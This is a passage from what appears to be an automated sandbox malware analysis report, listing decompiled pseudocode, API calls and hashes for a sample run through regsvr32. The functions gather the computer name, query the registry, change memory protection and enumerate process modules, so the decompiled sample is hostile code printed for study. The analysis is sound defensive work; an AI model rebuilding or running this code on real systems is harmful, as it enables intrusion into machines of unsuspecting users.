                								 *((intOrPtr*)(_t68 + 0x14)) = _t42;
                								_t43 = E031F2C11(_v8);
                								if( *((intOrPtr*)(_t68 + 0x14)) == 0) {
                									goto L18;
                								} else {
                									_a4 = 0x100;
                									_t44 = E031F23CC(_t43,  *((intOrPtr*)(_t68 + 4)));
                									_v8 = _t44;
                									if(_t44 == 0) {
                										goto L18;
                									} else {
                										_t45 =  *0x31fa2d8; // 0x240d5a8
                										_t21 = _t45 + 0x31fb758; // 0x450047
                										_t46 = _t21;
                										__imp__( *((intOrPtr*)(_t68 + 0x14)), _t46, _v8, 0, 0, 0, _a4); // executed
                										 *((intOrPtr*)(_t68 + 0x18)) = _t46;
                										E031F2C11(_v8);
                										_t48 =  *((intOrPtr*)(_t68 + 0x18));
                										if(_t48 == 0) {
                											goto L18;
                										} else {
                											_v12 = 4;
                											__imp__(_t48, 0x1f,  &_a4,  &_v12);
                											if(_t48 != 0) {
                												_a4 = _a4 | 0x00000100;
                												 *_t67( *((intOrPtr*)(_t68 + 0x18)), 0x1f,  &_a4, 4);
                											}
                											_push(4);
                											_push( &_a8);
                											_push(6);
                											_push( *((intOrPtr*)(_t68 + 0x18)));
                											if( *_t67() == 0) {
                												goto L18;
                											} else {
                												_push(4);
                												_push( &_a8);
                												_push(5);
                												_push( *((intOrPtr*)(_t68 + 0x18)));
                												if( *_t67() == 0) {
                													goto L18;
                												} else {
                													_t39 = 0;
                												}
                											}
                										}
                									}
                								}
                							} else {
                								_t42 =  *_t67( *(_t68 + 0x10), 3,  &_a8, 4);
                								if(_t42 == 0) {
                									goto L18;
                								} else {
                									goto L10;
                								}
                							}
                						}
                					}
                				}
                				return _t39;
                			}

                APIs
                  • Part of subcall function 031F23CC: lstrlen.KERNEL32(?,00000000,05609B30,00000000,031F3413,05609D0E,69B25F44,?,?,?,?,69B25F44,00000005,031FA010,4D283A53,?), ref: 031F23D3
                  • Part of subcall function 031F23CC: mbstowcs.NTDLL ref: 031F23FC
                  • Part of subcall function 031F23CC: memset.NTDLL ref: 031F240E
                • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,031F1064,00000000,00000000,05609618,?,?,031F6C0C,?,05609618,0000EA60), ref: 031F3822
                • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,031F1064,00000000,00000000,05609618,?,?,031F6C0C,?,05609618,0000EA60), ref: 031F3952
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                • String ID:
                • API String ID: 4097109750-0
                • Opcode ID: 1ca62e224f36cc1db56a3b221787b08e6a49c7e5c1dd8da8b3e4a6f9a0947fe0
                • Instruction ID: 78c8c185f1c79266ced551a9f5ba126094b7d51122b28c435073c3e3bb8ca14f
                • Opcode Fuzzy Hash: 1ca62e224f36cc1db56a3b221787b08e6a49c7e5c1dd8da8b3e4a6f9a0947fe0
                • Instruction Fuzzy Hash: 8F418EB9500309BFDB24EF60CC45EAABBF8FB4C740F044929BB55861A0D771DA85DB60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E031F51C7(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                				void* _v8;
                				void* __esi;
                				intOrPtr* _t35;
                				void* _t40;
                				intOrPtr* _t41;
                				intOrPtr* _t43;
                				intOrPtr* _t45;
                				intOrPtr* _t50;
                				intOrPtr* _t52;
                				void* _t54;
                				intOrPtr* _t55;
                				intOrPtr* _t57;
                				intOrPtr* _t61;
                				intOrPtr* _t65;
                				intOrPtr _t68;
                				void* _t72;
                				void* _t75;
                				void* _t76;
                
                				_t55 = _a4;
                				_t35 =  *((intOrPtr*)(_t55 + 4));
                				_a4 = 0;
                				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                				if(_t76 < 0) {
                					L18:
                					return _t76;
                				}
                				_t40 = E031F2C2D(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                				_t76 = _t40;
                				if(_t76 >= 0) {
                					_t61 = _a28;
                					if(_t61 != 0 &&  *_t61 != 0) {
                						_t52 = _v8;
                						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                					}
                					if(_t76 >= 0) {
                						_t43 =  *_t55;
                						_t68 =  *0x31fa2d8; // 0x240d5a8
                						_t20 = _t68 + 0x31fb1fc; // 0x740053
                						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                						if(_t76 >= 0) {
                							_t76 = E031F6AEB(_a4);
                							if(_t76 >= 0) {
                								_t65 = _a28;
                								if(_t65 != 0 &&  *_t65 == 0) {
                									_t50 = _a4;
                									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                								}
                							}
                						}
                						_t45 = _a4;
                						if(_t45 != 0) {
                							 *((intOrPtr*)( *_t45 + 8))(_t45);
                						}
                						_t57 = __imp__#6;
                						if(_a20 != 0) {
                							 *_t57(_a20);
                						}
                						if(_a12 != 0) {
                							 *_t57(_a12);
                						}
                					}
                				}
                				_t41 = _v8;
                				 *((intOrPtr*)( *_t41 + 8))(_t41);
                				goto L18;
                			}

                APIs
                  • Part of subcall function 031F2C2D: SysAllocString.OLEAUT32(80000002), ref: 031F2C84
                  • Part of subcall function 031F2C2D: SysFreeString.OLEAUT32(00000000), ref: 031F2CE9
                • SysFreeString.OLEAUT32(?), ref: 031F52A6
                • SysFreeString.OLEAUT32(031F1C26), ref: 031F52B0
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: String$Free$Alloc
                • String ID:
                • API String ID: 986138563-0
                • Opcode ID: 3f5368e0c4b76e48ab3094b8586042adcfec34623c9474ccd8c59cc5fe6458d2
                • Instruction ID: 9e831aeb3e615e5b70095475572ef5e515e6635f938a8d4f9aa12e1f3558d644
                • Opcode Fuzzy Hash: 3f5368e0c4b76e48ab3094b8586042adcfec34623c9474ccd8c59cc5fe6458d2
                • Instruction Fuzzy Hash: 6E312676900118EFCB11DF94C888C9BBB7AFF8E6407188658F9069B210D731ED92CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 04BCD0E6: RegCreateKeyA.ADVAPI32(80000001,0624B7F0,?), ref: 04BCD0FB
                  • Part of subcall function 04BCD0E6: lstrlen.KERNEL32(0624B7F0,00000000,00000000,04BED06E,?,?,?,04BC902F,00000001,?), ref: 04BCD124
                • RegQueryValueExA.KERNELBASE(?,?,00000000,?,04BED068,?,00000001,?,?,04BED06E,?,?,?,?), ref: 04BC9050
                • RegCloseKey.ADVAPI32(?,?,04BED06E,?,?,?,?), ref: 04BC9099
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CloseCreateQueryValuelstrlen
                • String ID:
                • API String ID: 971780412-0
                • Opcode ID: 0ffc0683f26a2b57b43b8746348ac33f08a036540ffff5f3020c60954ef36792
                • Instruction ID: 6745e8beaf9ccdfdeb43f11ec8cef7deec884732d1a267603443c15db412a025
                • Opcode Fuzzy Hash: 0ffc0683f26a2b57b43b8746348ac33f08a036540ffff5f3020c60954ef36792
                • Instruction Fuzzy Hash: B2315171D00219EFEB21DFA6E8809AEBBBCEB84750F1440ABE514AB141D7B56E41CB61
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 50%
                			E031F3318(intOrPtr* __eax, intOrPtr _a4) {
                				void* _v8;
                				void* _v12;
                				void* _v16;
                				intOrPtr* _t22;
                				void* _t23;
                				intOrPtr* _t24;
                				intOrPtr* _t26;
                				intOrPtr* _t28;
                				intOrPtr* _t30;
                				void* _t31;
                				intOrPtr* _t32;
                				intOrPtr _t42;
                				intOrPtr _t45;
                				intOrPtr _t48;
                				void* _t51;
                
                				_push( &_v16);
                				_t42 =  *0x31fa2d8; // 0x240d5a8
                				_t2 = _t42 + 0x31fb46c; // 0x20400
                				_push(0);
                				_push(__eax);
                				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
                				if(_t51 >= 0) {
                					_t22 = _v16;
                					_t45 =  *0x31fa2d8; // 0x240d5a8
                					_t6 = _t45 + 0x31fb48c; // 0xe7a1af80
                					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
                					_t51 = _t23;
                					if(_t51 >= 0) {
                						_t26 = _v12;
                						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
                						if(_t51 >= 0) {
                							_t48 =  *0x31fa2d8; // 0x240d5a8
                							_t30 = _v8;
                							_t12 = _t48 + 0x31fb47c; // 0xa4c6892c
                							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
                							_t51 = _t31;
                							_t32 = _v8;
                							 *((intOrPtr*)( *_t32 + 8))(_t32);
                						}
                						_t28 = _v12;
                						 *((intOrPtr*)( *_t28 + 8))(_t28);
                					}
                					_t24 = _v16;
                					 *((intOrPtr*)( *_t24 + 8))(_t24);
                				}
                				return _t51;
                			}

                APIs
                • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 031F3355
                • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 031F3386
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: Interface_ProxyQueryUnknown_
                • String ID:
                • API String ID: 2522245112-0
                • Opcode ID: 46b229c2d817e457e1c994d3ceb6632fdcfe5f65865e821f2947dbeb8d67e34b
                • Instruction ID: bb062ae41413d14eb13b14e8e32bd526e36c32d2ef49583ae860df736c5db1b6
                • Opcode Fuzzy Hash: 46b229c2d817e457e1c994d3ceb6632fdcfe5f65865e821f2947dbeb8d67e34b
                • Instruction Fuzzy Hash: 13212E79A00619EFCB00DBA4C458D5AB779FF8C714B148684E906DB325DB31ED45CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,016595A8,00000003,00000000,00000000), ref: 04BCEFBC
                • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,016595A8,00000003,00000000), ref: 04BCF003
                  • Part of subcall function 04BC57E0: RtlFreeHeap.NTDLL(00000000,?,04BC222D,?,?,?,?,?,?,?,?,04BC1089,?,?,?), ref: 04BC57EC
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                • String ID:
                • API String ID: 552344955-0
                • Opcode ID: f61585e966b646342ba321ba4e626003547e832fef0f1c7a60355618ef38f154
                • Instruction ID: 3d3031a2ed15b2b83e1a2b99bea83992e325472c7b871a5465e60fe566cf4939
                • Opcode Fuzzy Hash: f61585e966b646342ba321ba4e626003547e832fef0f1c7a60355618ef38f154
                • Instruction Fuzzy Hash: 18116975900208FBDB219FA9D8C4BAEB7B9EF90755F1040DDE50497240D7B4EA41DB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,04BD4776,69B25F44,?,?,00000000), ref: 04BC96B4
                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,04BD4776), ref: 04BC9715
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Time$FileFreeHeapSystem
                • String ID:
                • API String ID: 892271797-0
                • Opcode ID: 07ee9dfdcb20d46c3964794dfc95e98d790223574e60389bcd618969c39fdc88
                • Instruction ID: ac917a96f39f0d84a2cc346dd153803e458ff203a9f668b1c55817c19f2bd90d
                • Opcode Fuzzy Hash: 07ee9dfdcb20d46c3964794dfc95e98d790223574e60389bcd618969c39fdc88
                • Instruction Fuzzy Hash: C6110AB6900209EBEF01EFA1D984A9EB7BCEB48705F0004A6E505E7145E778EB44DF61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 031F5788
                  • Part of subcall function 031F51C7: SysFreeString.OLEAUT32(?), ref: 031F52A6
                • SafeArrayDestroy.OLEAUT32(?), ref: 031F57D5
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: ArraySafe$CreateDestroyFreeString
                • String ID:
                • API String ID: 3098518882-0
                • Opcode ID: 369cd838ab7dbf39fc10779bf1b9770ef87b5eae36844044ef14f0158e34b1db
                • Instruction ID: 48fa6039dd389c7f7d6f9e44374211bf3bd5770a332b5e42c65a7553d8708fe7
                • Opcode Fuzzy Hash: 369cd838ab7dbf39fc10779bf1b9770ef87b5eae36844044ef14f0158e34b1db
                • Instruction Fuzzy Hash: 6A115276A00609BFDB04EF94C844EEEBBB9EF0C350F058115FA04E6160D7759A55DFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SysAllocString.OLEAUT32(031F19CD), ref: 031F7192
                  • Part of subcall function 031F51C7: SysFreeString.OLEAUT32(?), ref: 031F52A6
                • SysFreeString.OLEAUT32(00000000), ref: 031F71D2
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: String$Free$Alloc
                • String ID:
                • API String ID: 986138563-0
                • Opcode ID: d93b831f925b17cf475bf3e1dcae36285f5a012836b66ef90674e1c3a2024931
                • Instruction ID: 8fd7c75f9843e5a39a0bd29cedbeff497a60ef8fa764c04fa620a3a07a977b52
                • Opcode Fuzzy Hash: d93b831f925b17cf475bf3e1dcae36285f5a012836b66ef90674e1c3a2024931
                • Instruction Fuzzy Hash: DD014B7650061ABFCB11EF68D808D9FBBB9FF4C350B014122EE05E6120E770AA198BA1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E031F71E5(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
                				void* _t24;
                				signed short _t25;
                				signed int _t27;
                				intOrPtr* _t28;
                				signed short _t29;
                
                				_t28 = __edi;
                				if(_a4 == 0) {
                					L2:
                					_t29 = E031F55E9(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                					if(_t29 == 0) {
                						_t27 = _a12 >> 1;
                						if(_t27 == 0) {
                							_t29 = 2;
                							HeapFree( *0x31fa290, 0, _a4);
                						} else {
                							_t24 = _a4;
                							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
                							 *_t28 = _t24;
                						}
                					}
                					L6:
                					return _t29;
                				}
                				_t25 = E031F167E(_a4, _a8, _a12, __edi); // executed
                				_t29 = _t25;
                				if(_t29 == 0) {
                					goto L6;
                				}
                				goto L2;
                			}

                APIs
                  • Part of subcall function 031F167E: SysFreeString.OLEAUT32(00000000), ref: 031F16E4
                • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74E5F710,?,00000000,?,00000000,?,031F5D33,?,004F0053,056093E0,00000000,?), ref: 031F7246
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: Free$HeapString
                • String ID: Ut
                • API String ID: 3806048269-8415677
                • Opcode ID: 1a57416f9a683c3abd67a230a1deeeacdf6074c0bd1e7d9c7258dbbbdfe029f9
                • Instruction ID: f85f928ef1289845b5b51b9224cf00a5a6e61e44f46e6ac39c659567ac494de4
                • Opcode Fuzzy Hash: 1a57416f9a683c3abd67a230a1deeeacdf6074c0bd1e7d9c7258dbbbdfe029f9
                • Instruction Fuzzy Hash: F201E832100219BFCB229F88DC01FEA7B69FB0C790F088025FE099A161D731D9A0DB90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E031F4A14(void* __ecx) {
                				signed int _v8;
                				void* _t15;
                				void* _t19;
                				void* _t20;
                				void* _t22;
                				intOrPtr* _t23;
                
                				_t23 = __imp__;
                				_t20 = 0;
                				_v8 = _v8 & 0;
                				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                				_t10 = _v8;
                				if(_v8 != 0) {
                					_t20 = E031F2114(_t10 + 1);
                					if(_t20 != 0) {
                						_t15 =  *_t23(3, _t20,  &_v8); // executed
                						if(_t15 != 0) {
                							 *((char*)(_v8 + _t20)) = 0;
                						} else {
                							E031F2C11(_t20);
                							_t20 = 0;
                						}
                					}
                				}
                				return _t20;
                			}

                APIs
                • GetComputerNameExA.KERNELBASE(00000003,00000000,?,?,00000000,?,?,031F7553), ref: 031F4A2C
                  • Part of subcall function 031F2114: RtlAllocateHeap.NTDLL(00000000,00000000,031F6F72), ref: 031F2120
                • GetComputerNameExA.KERNELBASE(00000003,00000000,?,?,?,?,031F7553), ref: 031F4A49
                  • Part of subcall function 031F2C11: RtlFreeHeap.NTDLL(00000000,00000000,031F7013,00000000,?,?,00000000), ref: 031F2C1D
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: ComputerHeapName$AllocateFree
                • String ID:
                • API String ID: 187446995-0
                • Opcode ID: 39315e60b4e66d35957a4076a27d148ecfcc101ccc25c20aff5f214f19b15b27
                • Instruction ID: cda01543f8e3c75d0ce0b2d674ac39b0461c1ff4c2f222e1becd7387ab27339c
                • Opcode Fuzzy Hash: 39315e60b4e66d35957a4076a27d148ecfcc101ccc25c20aff5f214f19b15b27
                • Instruction Fuzzy Hash: 8DF0B47A604209BFEB10D69ADC01FAF77ECDBC9A00F250155AA02D7100EB70DB0297B0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E031F5E26(WCHAR* _a4) {
                				void* __edi;
                				intOrPtr _t11;
                				intOrPtr _t14;
                				void* _t16;
                				void* _t18;
                				WCHAR* _t20;
                
                				_t20 = E031F2114(lstrlenW(_a4) + _t7 + 0x5c);
                				if(_t20 == 0) {
                					_t18 = 8;
                				} else {
                					_t11 =  *0x31fa2d8; // 0x240d5a8
                					_t5 = _t11 + 0x31fba50; // 0x43002f
                					wsprintfW(_t20, _t5, 5, _a4);
                					_t14 =  *0x31fa2d8; // 0x240d5a8
                					_t6 = _t14 + 0x31fb8fc; // 0x6d0063
                					_t16 = E031F6096(0, _t6, _t20, 0); // executed
                					_t18 = _t16;
                					E031F2C11(_t20);
                				}
                				return _t18;
                			}

                APIs
                • lstrlenW.KERNEL32(74E5F710,00000000,?,031F61EA,00000000,?,74E5F710,00000000,74E5F730), ref: 031F5E2C
                  • Part of subcall function 031F2114: RtlAllocateHeap.NTDLL(00000000,00000000,031F6F72), ref: 031F2120
                • wsprintfW.USER32 ref: 031F5E55
                  • Part of subcall function 031F6096: memset.NTDLL ref: 031F60B9
                  • Part of subcall function 031F6096: GetLastError.KERNEL32 ref: 031F6105
                  • Part of subcall function 031F2C11: RtlFreeHeap.NTDLL(00000000,00000000,031F7013,00000000,?,?,00000000), ref: 031F2C1D
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$AllocateErrorFreeLastlstrlenmemsetwsprintf
                • String ID:
                • API String ID: 1672627171-0
                • Opcode ID: 929b08079b3d143c101e46c136e77269543b0759046c328407c9802f92988a5e
                • Instruction ID: b1515510e3469d1f5a11d044c7cd7176eb34b00d67e996ae84296d968adb5c8d
                • Opcode Fuzzy Hash: 929b08079b3d143c101e46c136e77269543b0759046c328407c9802f92988a5e
                • Instruction Fuzzy Hash: 8CF090366042146FC624EB64EC08E5B779DEF8D710F168511FB04CB215C735E5A28BB5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlEnterCriticalSection.NTDLL(04BEE480), ref: 04BD8E68
                • RtlLeaveCriticalSection.NTDLL(04BEE480), ref: 04BD8EA4
                  • Part of subcall function 04BE0B4D: lstrlen.KERNEL32(?,?,00000000,?,04BCB5BA,04BED4E4,04BC159F,04BC158F,00000004,00000000,?,00000000,04BE48E6,04BDCCD7,04BC159F,04BC158F), ref: 04BE0B9A
                  • Part of subcall function 04BE0B4D: VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,04BCB5BA,04BED4E4,04BC159F,04BC158F,00000004,00000000,?,00000000,04BE48E6), ref: 04BE0BAC
                  • Part of subcall function 04BE0B4D: lstrcpy.KERNEL32(00000000,?), ref: 04BE0BBB
                  • Part of subcall function 04BE0B4D: VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,04BCB5BA,04BED4E4,04BC159F,04BC158F,00000004,00000000,?,00000000,04BE48E6), ref: 04BE0BCC
                  • Part of subcall function 04BC57E0: RtlFreeHeap.NTDLL(00000000,?,04BC222D,?,?,?,?,?,?,?,?,04BC1089,?,?,?), ref: 04BC57EC
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                • String ID:
                • API String ID: 1872894792-0
                • Opcode ID: 92145aec265f243b689e5ca2181d5f8cacbabafcbce4329f185d050fef321fce
                • Instruction ID: 6f2f24ddb10e5f593f84b1c3819b7ef06f3a5a3cc7258b1f104f399c1dca5163
                • Opcode Fuzzy Hash: 92145aec265f243b689e5ca2181d5f8cacbabafcbce4329f185d050fef321fce
                • Instruction Fuzzy Hash: C2F0E5762012259FA7207F6ED88483AF7B8EBC921970542CBE95567310CBB6BC00CAF0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • InterlockedIncrement.KERNEL32(04BEE0DC), ref: 04BD6FC5
                  • Part of subcall function 04BCAFD1: GetSystemTimeAsFileTime.KERNEL32(?), ref: 04BCAFFC
                  • Part of subcall function 04BCAFD1: HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 04BCB009
                  • Part of subcall function 04BCAFD1: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 04BCB095
                  • Part of subcall function 04BCAFD1: GetModuleHandleA.KERNEL32(00000000), ref: 04BCB0A0
                  • Part of subcall function 04BCAFD1: RtlImageNtHeader.NTDLL(00000000), ref: 04BCB0A9
                  • Part of subcall function 04BCAFD1: RtlExitUserThread.NTDLL(00000000), ref: 04BCB0BE
                • InterlockedDecrement.KERNEL32(04BEE0DC), ref: 04BD6FE9
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
                • String ID:
                • API String ID: 1011034841-0
                • Opcode ID: 01571c9f093316eeefc152b6fc6a8898bd1c0ea86f29610ca8692d1df49f31c6
                • Instruction ID: fae5023b3584592adb05593ce9a50f4de1784fbc29c5c96d562f967700256d8d
                • Opcode Fuzzy Hash: 01571c9f093316eeefc152b6fc6a8898bd1c0ea86f29610ca8692d1df49f31c6
                • Instruction Fuzzy Hash: 7BE0D8313C9922D7CB656F759C44B2AB760EB90741F0048F8F570D2090E720F844CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E031F6D32(signed int __edx, void* __edi, intOrPtr _a4) {
                				void* _t3;
                				void* _t5;
                				void* _t8;
                				void* _t9;
                				void* _t10;
                				signed int _t11;
                
                				_t11 = __edx;
                				_t3 = HeapCreate(0, 0x400000, 0); // executed
                				 *0x31fa290 = _t3;
                				if(_t3 == 0) {
                					_t9 = 8;
                					return _t9;
                				}
                				 *0x31fa180 = GetTickCount();
                				_t5 = E031F500B(_a4);
                				if(_t5 == 0) {
                					E031F2F14(_t10, __edi, _a4); // executed
                					if(E031F17FF(_t10) != 0) {
                						 *0x31fa2b8 = 1; // executed
                					}
                					_t8 = E031F34A2(_t11); // executed
                					return _t8;
                				}
                				return _t5;
                			}

                APIs
                • HeapCreate.KERNELBASE(00000000,00400000,00000000,031F1B56,?), ref: 031F6D3B
                • GetTickCount.KERNEL32 ref: 031F6D4F
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
